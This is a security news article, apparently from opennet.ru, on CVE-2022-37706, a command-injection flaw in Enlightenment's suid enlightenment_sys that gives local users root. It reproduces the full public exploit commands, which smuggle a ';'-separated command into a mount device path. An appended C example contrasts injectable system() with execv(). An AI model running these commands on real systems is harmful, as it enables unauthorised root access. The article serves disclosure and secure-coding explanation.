Vulnerability in the Enlightenment User Environment Allowing Root Access

A vulnerability (CVE-2022-37706) has been identified in the Enlightenment user environment that allows an unprivileged local user to execute code as root. The vulnerability has not yet been fixed (0-day), but an exploit is already publicly available and has been tested on Ubuntu 22.04.

The problem is in the enlightenment_sys executable, which ships with the suid root flag and runs certain permitted commands, such as mounting a drive with the mount utility, through a system() call. Because the function that builds the string passed to system() works incorrectly, quotes are stripped from the arguments of the command being run, and this can be used to run your own code. For example, when running

    mkdir -p /tmp/net
    mkdir -p "/tmp/;/tmp/exploit"
    echo "/bin/sh" > /tmp/exploit
    chmod a+x /tmp/exploit
    enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

the double quotes are removed, so instead of the specified command '/bin/mount… "/dev/../tmp/;/tmp/exploit" /tmp///net', a string without the double quotes, '/bin/mount ... /dev/../tmp/;/tmp/exploit /tmp///net', is passed to system(). As a result the command '/tmp/exploit /tmp///net' is executed separately instead of being treated as part of the path to the device. The strings "/dev/../tmp/" and "/tmp///net" are chosen to get past the argument check that enlightenment_sys applies to the mount command (the device to mount must start with /dev/ and point to an existing file, and the three "/" characters in the mount point are there to reach the required path length).
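The difference between handing the argument to a shell and handing it to the program as a single argv element, as an added example that is not code from the article or from the Enlightenment source. It assumes /bin/echo as a stand-in for /bin/mount, uses `exit 7` as a harmless constructed second command, and the function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Prefix part of the check the article describes; "/dev/../tmp/;..." passes it. */
int has_dev_prefix(const char *dev)
{
    return strncmp(dev, "/dev/", 5) == 0;
}

/* Flawed pattern: the argument is pasted unquoted into a string that /bin/sh
 * parses, so a ';' inside it ends the first command and starts a second one.
 * /bin/echo stands in for /bin/mount (assumption of this example). */
int run_via_system(const char *dev)
{
    char cmd[512];
    int n = snprintf(cmd, sizeof cmd, "/bin/echo %s", dev);
    if (n < 0 || (size_t)n >= sizeof cmd)
        return -1;
    int st = system(cmd);
    return (st != -1 && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}

/* Hardened pattern: no shell is involved; the argument reaches the program
 * as one argv element, so ';' is only a byte inside a path. */
int run_via_execv(const char *dev)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "echo", (char *)dev, NULL };
        execv("/bin/echo", argv);
        _exit(127);                 /* reached only if execv failed */
    }
    int st;
    if (waitpid(pid, &st, 0) < 0)
        return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void)
{
    const char *dev = "/dev/../tmp/;exit 7";    /* constructed input */
    printf("system(): exit status %d\n", run_via_system(dev));
    printf("execv():  exit status %d\n", run_via_execv(dev));
    return 0;
}
```

With the shell in the path the exit status comes from the second command; with execv the whole string is echoed back as one argument and the status is that of echo itself.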

Source: opennet.ru
